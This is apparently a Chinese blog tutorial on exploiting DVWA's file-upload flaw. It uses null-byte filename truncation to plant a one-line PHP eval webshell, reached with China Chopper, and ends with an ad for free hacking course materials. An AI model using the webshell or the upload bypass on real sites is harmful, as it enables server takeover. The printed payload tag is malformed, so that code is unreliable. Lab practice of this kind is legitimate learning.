黑客入门利器，dvwa文件上传漏洞，带你进入黑客大门

在kali的里面随机找一张png结尾的图片，然后重命名一下改成1.php%00.png。

改成这样的名字！！

然后用编辑器编辑一下！

在空白处写入一句话木马！！<%php @eval($_POST[pass]);?>

像这样：

然后保存！

打开burpsuit抓个包看看！！


可惜了，我们用了%00截断不需要改包！

这样就上传成功！！！

在菜刀地址上填上上路径！！再填上上密码！！！

就可以看见我的服务器里面的目录了，因为我的centos 7 所以罗！

然后我们进入我的服务器端看看！！

画红线的就是我们上传的木马！！！

从靠劳力赚钱转变成靠脑力赚钱，想入门黑客的小白肯定想知道如何学好？

一、网安学习成长路线图

Python所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。

二、网安视频合集

观看零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。

四、网络安全源码合集+工具包

光学理论是没用的，要学会跟着一起敲，要动手实操，才能将自己的所学运用到实际当中去，这时候可以搞点实战案例来学习。

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块

这份完整版的学习资料已经上传CSDN，朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】